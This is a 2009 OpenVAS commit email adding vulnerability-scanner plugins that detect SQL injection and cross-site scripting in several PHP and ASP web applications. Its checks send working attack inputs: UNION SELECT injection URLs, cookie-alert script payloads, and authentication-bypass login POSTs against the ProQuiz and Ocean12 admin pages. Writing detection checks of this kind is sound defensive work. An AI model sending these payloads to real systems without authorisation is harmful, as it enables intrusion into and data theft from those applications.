[Openvas-commits] r2754 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Fri Mar 13 06:42:31 CET 2009
Author: chandra
Date: 2009-03-13 06:42:27 +0100 (Fri, 13 Mar 2009)
New Revision: 2754
Added:
trunk/openvas-plugins/scripts/Chipmunk_guestbook_sql_injection_and_xss.nasl
trunk/openvas-plugins/scripts/PHPFusion_book_panel_module_sql_injection.nasl
trunk/openvas-plugins/scripts/PHPRecipeBook_sql_injection.nasl
trunk/openvas-plugins/scripts/ProQuiz_sql_injection.nasl
trunk/openvas-plugins/scripts/RevSense_sql_injection_and_xss.nasl
trunk/openvas-plugins/scripts/burning_board_3_0_5_input_validation.nasl
trunk/openvas-plugins/scripts/mambo_detect.nasl
trunk/openvas-plugins/scripts/ocean12_sql_injection.nasl
trunk/openvas-plugins/scripts/phpCommunity2_multiple_remote_input_validation.nasl
Modified:
trunk/openvas-plugins/ChangeLog
Log:
Added Michael Meyer's plugins
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/ChangeLog 2009-03-13 05:42:27 UTC (rev 2754)
@@ -1,3 +1,15 @@
+2009-03-13 Chandrashekhar B <bchandra at secpod.com>
+ * scripts/Chipmunk_guestbook_sql_injection_and_xss.nasl,
+ scripts/RevSense_sql_injection_and_xss.nasl,
+ scripts/burning_board_3_0_5_input_validation.nasl,
+ scripts/ocean12_sql_injection.nasl,
+ scripts/ProQuiz_sql_injection.nasl,
+ scripts/PHPRecipeBook_sql_injection.nasl,
+ scripts/PHPFusion_book_panel_module_sql_injection.nasl,
+ scripts/mambo_detect.nasl,
+ scripts/phpCommunity2_multiple_remote_input_validation.nasl:
+ Added new plugins from Michael Meyer
+
2009-03-12 Chandrashekhar B <bchandra at secpod.com>
* scripts/gb_php_sql_inj_vuln.nasl,
scripts/secpod_php_imagerotate_info_disc_vuln.nasl,
Added: trunk/openvas-plugins/scripts/Chipmunk_guestbook_sql_injection_and_xss.nasl
===================================================================
--- trunk/openvas-plugins/scripts/Chipmunk_guestbook_sql_injection_and_xss.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/Chipmunk_guestbook_sql_injection_and_xss.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: Chipmunk_guestbook_sql_injection_and_xss.nasl 116 2009-03-10 17:49:48Z mime $
+#
+# Chipmunk Guestbook Index.PHP SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100039);
+ script_bugtraq_id(18195);
+ script_cve_id("CVE-2008-6368");
+ script_version ("1.0");
+
+ script_name(english:"Chipmunk Guestbook Index.PHP SQL Injection Vulnerability");
+ desc["english"] = "
+
+ Overview:
+ Chipmunk Guestbook is prone to an SQL-injection vulnerability
+ because it fails to properly sanitize user-supplied input before
+ using it in an SQL query.
+
+ A successful exploit could allow an attacker to compromise the
+ application, access or modify data, or exploit vulnerabilities in
+ the underlying database.
+
+ See also;
+ http://www.securityfocus.com/bid/18195
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if Chipmunk Guestbook is prone to SQL Injection and Cross Site Scripting");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port)) exit(0);
+
+dir = make_list("/guestbook",cgi_dirs());
+
+foreach d (dir)
+{
+ url = string(d, "/index.php?start=<script>alert(document.cookie)</script>");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+ if (
+ egrep(pattern:".*You have an error in your SQL syntax.*", string: buf) &&
+ egrep(pattern:".*<script>alert\(document.cookie\)</script>.*", string: buf)
+ )
+
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
+
+exit(0);
Added: trunk/openvas-plugins/scripts/PHPFusion_book_panel_module_sql_injection.nasl
===================================================================
--- trunk/openvas-plugins/scripts/PHPFusion_book_panel_module_sql_injection.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/PHPFusion_book_panel_module_sql_injection.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: PHPFusion_book_panel_module_sql_injection.nasl 121 2009-03-12 13:58:23Z mime $
+#
+# PHP-Fusion Book Panel Module 'books.php' SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100043);
+ script_bugtraq_id(34049);
+ script_version ("1.0");
+
+ script_name(english:"PHP-Fusion Book Panel Module 'books.php' SQL Injection Vulnerability");
+ desc["english"] = "
+
+ Overview:
+ The Book Panel module for PHP-Fusion is prone to an SQL-injection
+ vulnerability because it fails to sufficiently sanitize
+ user-supplied data before using it in an SQL query.
+
+ Exploiting this issue could allow an attacker to compromise the
+ application, access or modify data, or exploit latent
+ vulnerabilities in the underlying database.
+
+ See also:
+ http://www.securityfocus.com/bid/34049
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"PHP-Fusion Book Panel Module 'books.php' SQL Injection Vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dir = make_list("/infusions", cgi_dirs());
+foreach d (dir)
+{
+ url = string(d, "/book_panel/books.php?&bookid=-1+union+select+1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4,5,6--");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
+ if( buf == NULL )continue;
+
+ if(
+ egrep(pattern: "OpenVAS-SQL-Injection-Test", string: buf)
+ )
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
+exit(0);
Added: trunk/openvas-plugins/scripts/PHPRecipeBook_sql_injection.nasl
===================================================================
--- trunk/openvas-plugins/scripts/PHPRecipeBook_sql_injection.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/PHPRecipeBook_sql_injection.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: PHPRecipeBook_sql_injection.nasl 120 2009-03-12 13:36:43Z mime $
+#
+# PHPRecipeBook 'base_id' Parameter SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100042);
+ script_bugtraq_id(34052);
+ script_version ("1.0");
+
+ script_name(english:"PHPRecipeBook 'base_id' Parameter SQL Injection Vulnerability");
+ desc["english"] = "
+
+ Overview:
+ PHPRecipeBook is prone to an SQL-injection vulnerability because it
+ fails to sufficiently sanitize user-supplied data before using it in
+ an SQL query.
+
+ Exploiting this issue could allow an attacker to compromise the
+ application, access or modify data, or exploit latent
+ vulnerabilities in the underlying database.
+
+ PHPRecipeBook 2.24 is vulnerable; other versions may also be affected.
+
+ See also:
+ http://www.securityfocus.com/bid/34052
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if PHPRecipeBook is vulnerable to SQL Injection.");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dir = make_list("/phprecipebook","/recipebook","recipe", cgi_dirs());
+foreach d (dir)
+{
+ url = string(d, "/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,+0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4,5,6,7+from+security_users--");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
+ if( buf == NULL )continue;
+
+ if(
+ egrep(pattern: "OpenVAS-SQL-Injection-Test", string: buf)
+ )
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
+exit(0);
Added: trunk/openvas-plugins/scripts/ProQuiz_sql_injection.nasl
===================================================================
--- trunk/openvas-plugins/scripts/ProQuiz_sql_injection.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/ProQuiz_sql_injection.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,106 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: ProQuiz_sql_injection.nasl 117 2009-03-10 18:21:01Z mime $
+#
+# ProQuiz 'Username' and 'Password' Parameters SQL Injection
+# Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100040);
+ script_bugtraq_id(32724);
+ script_cve_id("CVE-2008-6312","CVE-2008-6327");
+ script_version ("1.0");
+
+ script_name(english:"ProQuiz 'Username' and 'Password' Parameters SQL Injection Vulnerability");
+ desc["english"] = "
+
+ Overview:
+ ProQuiz is prone to an SQL-injection vulnerability because it fails
+ to sufficiently sanitize user-supplied data before using it in an
+ SQL query.
+
+ Exploiting this issue could allow an attacker to compromise the
+ application, access or modify data, or exploit latent
+ vulnerabilities in the underlying database.
+
+ ProQuiz 1.0 is vulnerable; other versions may also be affected.
+
+ See also:
+ http://www.securityfocus.com/bid/32724
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if ProQuiz is vulnerable to SQL Injection");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/proquiz",cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/admin/index.php");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
+ if( buf == NULL )continue;
+
+ if( egrep(pattern: "This is the Admin Panel of TRDC.IN", string: buf) ) {
+
+ variables = string("username=' or 1=1#&password=x");
+ filename = string(dir + "/admin/index.php");
+ host=get_host_name();
+
+ req = string(
+ "POST ", filename, " HTTP/1.0\r\n",
+ "Referer: ","http://", host, filename, "\r\n",
+ "Host: ", host, ":", port, "\r\n",
+ "Content-Type: application/x-www-form-urlencoded\r\n",
+ "Content-Length: ", strlen(variables),
+ "\r\n\r\n",
+ variables
+ );
+
+ result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+
+ if(egrep(pattern: "Location: admin.php", string: result)) {
+ security_warning(port);
+ exit(0);
+ }
+ }
+}
+
+exit(0);
Added: trunk/openvas-plugins/scripts/RevSense_sql_injection_and_xss.nasl
===================================================================
--- trunk/openvas-plugins/scripts/RevSense_sql_injection_and_xss.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/RevSense_sql_injection_and_xss.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,92 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: RevSense_sql_injection_and_xss.nasl 116 2009-03-10 17:49:48Z mime $
+#
+# RevSense SQL Injection and Cross Site Scripting Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100038);
+ script_bugtraq_id(32624);
+ script_cve_id("CVE-2008-6385");
+ script_version ("1.0");
+
+ script_name(english:"RevSense SQL Injection and Cross Site Scripting Vulnerabilities");
+ desc["english"] = "
+
+ Overview:
+ RevSense is prone to an SQL-injection vulnerability and a cross-site
+ scripting vulnerability because it fails to sufficiently sanitize
+ user-supplied data.
+
+ Exploiting these issues could allow an attacker to steal
+ cookie-based authentication credentials, compromise the application,
+ access or modify data, or exploit latent vulnerabilities in the
+ underlying database.
+
+ RevSense 1.0 is vulnerable; other versions may also be affected.
+
+ See also;
+ http://www.securityfocus.com/bid/32624
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if RevSense is prone to SQL Injection and Cross Site Scripting");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port)) exit(0);
+
+dir = make_list("/revsense",cgi_dirs());
+
+foreach d (dir)
+{
+ url = string(d, "/index.php?section=<script>alert(document.cookie)</script>&action=login");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if (
+ egrep(pattern:".*AdRevenue Error: \[ <script>alert\(document.cookie\)</script> \] not found.*", string: buf)
+ )
+
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
+
+exit(0);
Added: trunk/openvas-plugins/scripts/burning_board_3_0_5_input_validation.nasl
===================================================================
--- trunk/openvas-plugins/scripts/burning_board_3_0_5_input_validation.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/burning_board_3_0_5_input_validation.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,95 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: burning_board_3_0_5_input_validation.nasl 118 2009-03-10 18:37:06Z mime $
+#
+# Woltlab Burning Board Multiple Input Validation Vulnerabilites
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100041);
+ script_bugtraq_id(34057);
+ script_version ("1.0");
+
+ script_name(english:"Woltlab Burning Board Multiple Input Validation Vulnerabilites");
+ desc["english"] = "
+
+ Overview:
+
+ Woltlab Burning Board is prone to multiple input-validation vulnerabilities, including:
+
+ - Multiple security that may allow attackers to delete private messages
+ - A cross-site scripting vulnerability
+ - Multiple URI redirection vulnerabilities
+
+ Attackers can exploit these issues to delete private messages,
+ execute arbitrary script code, steal cookie-based authentication
+ credentials and redirect users to malicious sites.
+
+ Vulnerable:
+ Woltlab Burning Board 3.0.5
+ Woltlab Burning Board 3.0.3 PL 1
+ Woltlab Burning Board 3.0
+
+ See also;
+ http://www.securityfocus.com/bid/34057
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if Woltlab Burning Board is prone to Multiple Input Validation Vulnerabilites");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port)) exit(0);
+
+dir = make_list("/forum","/board",cgi_dirs());
+
+foreach d (dir)
+{
+ url = string(d, "/wcf/acp/dereferrer.php?url=javascript:alert(document.cookie);");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if (egrep(pattern:".*<a href=.javascript:alert\(document.cookie\);.>javascript:alert\(document.cookie\);</a>.*", string: buf)
+ )
+
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
+
+exit(0);
Added: trunk/openvas-plugins/scripts/mambo_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/mambo_detect.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/mambo_detect.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,195 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: mambo_detect.nasl 113 2009-03-09 17:33:16Z mime $
+#
+# mambo Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+# need desc here to modify it later in script.
+desc["english"] = "
+
+ Overview:
+ This host is running mambo a widely installed Open Source cms solution.
+
+ See also:
+ http://www.mamboserver.com
+
+ Risk factor : None";
+
+if (description)
+{
+ script_id(100036);
+ script_version ("1.0");
+
+ script_name(english:"mambo Detection");
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Checks for the presence of mambo");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"General");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port)) exit(0);
+
+dirs = make_list("/mambo","/cms",cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/index.php");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if(
+ egrep(pattern: "^Set-Cookie: mosvisitor=1", string: buf) ||
+ egrep(pattern: '.*meta name="description" content="This site uses Mambo.*', string: buf) ||
+ egrep(pattern: '.*meta name="Generator" content="Mambo.*', string: buf) ||
+ egrep(pattern: '.*http://mambo-foundation.org<[^>]+>Mambo.*', string: buf)
+ )
+ {
+ if(strlen(dir)>0) {
+ install=dir;
+ } else {
+ install=string("/");
+ }
+
+ } else {
+
+ url = string(dir, "/htaccess.txt");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if(
+ egrep(pattern: ".*# @package Mambo.*", string: buf)
+ )
+ {
+ if(strlen(dir)>0) {
+ install=dir;
+ } else {
+ install=string("/");
+ }
+
+ } else {
+
+ url = string(dir, "/README.php");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if(
+ egrep(pattern: "^Mambo is Open Source software.*", string: buf)
+ )
+ {
+ if(strlen(dir)>0) {
+ install=dir;
+ } else {
+ install=string("/");
+ }
+
+ } else {
+
+ url = string(dir, "/includes/js/mambojavascript.js");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if(
+ egrep(pattern: ".*@package Mambo.*", string: buf)
+ )
+ {
+ if(strlen(dir)>0) {
+ install=dir;
+ } else {
+ install=string("/");
+ }
+
+ }
+
+ }
+ }
+
+ }
+
+ if(install) {
+
+ vers = string("unknown");
+ #try to get version
+
+ url = string(dir, "/administrator/components/com_admin/version.xml");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ version = eregmatch(string: buf, pattern: "<version>(.*)</version>");
+
+ if ( !isnull(version[1]) ) {
+ vers=version[1];
+ } else {
+
+ url = string(dir, "/mambots/content/moscode.xml");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ version = eregmatch(string: buf, pattern: ".*<version>(.*)</version>.*");
+
+ if ( !isnull(version[1]) ) {
+ vers=version[1];
+ } else {
+
+ url = string(dir, "/help/mambo.whatsnew.html");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ version = eregmatch(string: buf, pattern: ".*<h1>.*New in Version (.*)</h1>.*");
+
+ if ( !isnull(version[1]) ) {
+ vers=version[1];
+ }
+ }
+
+ }
+
+ set_kb_item(name: string("www/", port, "/mambo_mos"), value: string(vers," under ",install));
+ info = string("None\n\nmambo Version (");
+ info += string(vers);
+ info += string(") was detected on the remote host in the following directory(s):\n\n");
+ info += string(install, "\n");
+
+ desc = ereg_replace(
+ string:desc["english"],
+ pattern:"None$",
+ replace:info
+ );
+
+ security_note(port:port,data:desc);
+ exit(0);
+ }
+}
+exit(0);
Added: trunk/openvas-plugins/scripts/ocean12_sql_injection.nasl
===================================================================
--- trunk/openvas-plugins/scripts/ocean12_sql_injection.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/ocean12_sql_injection.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,102 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: ocean12_sql_injection.nasl 114 2009-03-10 11:41:37Z mime $
+#
+# Ocean12 Membership Manager Pro 'login.asp' SQL Injection
+# Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100037);
+ script_bugtraq_id(32508);
+ script_version ("1.0");
+
+ script_name(english:"Ocean12 Membership Manager Pro 'login.asp' SQL Injection Vulnerability");
+ desc["english"] = "
+
+ Overview:
+ Ocean12 Membership Manager Pro is prone to an SQL-injection
+ vulnerability because it fails to sufficiently sanitize
+ user-supplied data.
+
+ A successful exploit may allow an attacker to compromise the
+ application, access or modify data, or exploit latent
+ vulnerabilities in the underlying database.
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if Ocean12 Membership Manager Pro is vulnerable to SQL Injection");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_asp(port:port))exit(0);
+
+dirs = make_list(cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/default.asp");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
+ if( buf == NULL )continue;
+
+ if(
+ egrep(pattern: "<title>Ocean12 Membership Manager Pro</title>", string: buf) &&
+ egrep(pattern: '<form method="post" action="login.asp">', string: buf)) {
+
+ variables = string("Username=admin ' or ' 1=1&Password=x");
+ filename = string(dir + "/login.asp");
+ host=get_host_name();
+
+ req = string(
+ "POST ", filename, " HTTP/1.0\r\n",
+ "Referer: ","http://", host, filename, "\r\n",
+ "Host: ", host, ":", port, "\r\n",
+ "Content-Type: application/x-www-form-urlencoded\r\n",
+ "Content-Length: ", strlen(variables),
+ "\r\n\r\n",
+ variables
+ );
+
+ result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+
+ if(egrep(pattern: "Location: main.asp", string: result)) {
+ security_warning(port);
+ exit(0);
+ }
+ }
+}
+
+exit(0);
Added: trunk/openvas-plugins/scripts/phpCommunity2_multiple_remote_input_validation.nasl
===================================================================
--- trunk/openvas-plugins/scripts/phpCommunity2_multiple_remote_input_validation.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/phpCommunity2_multiple_remote_input_validation.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: phpCommunity2_multiple_remote_input_validation.nasl 119 2009-03-10 19:43:38Z mime $
+#
+# phpCommunity2 Multiple Remote Input Validation Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
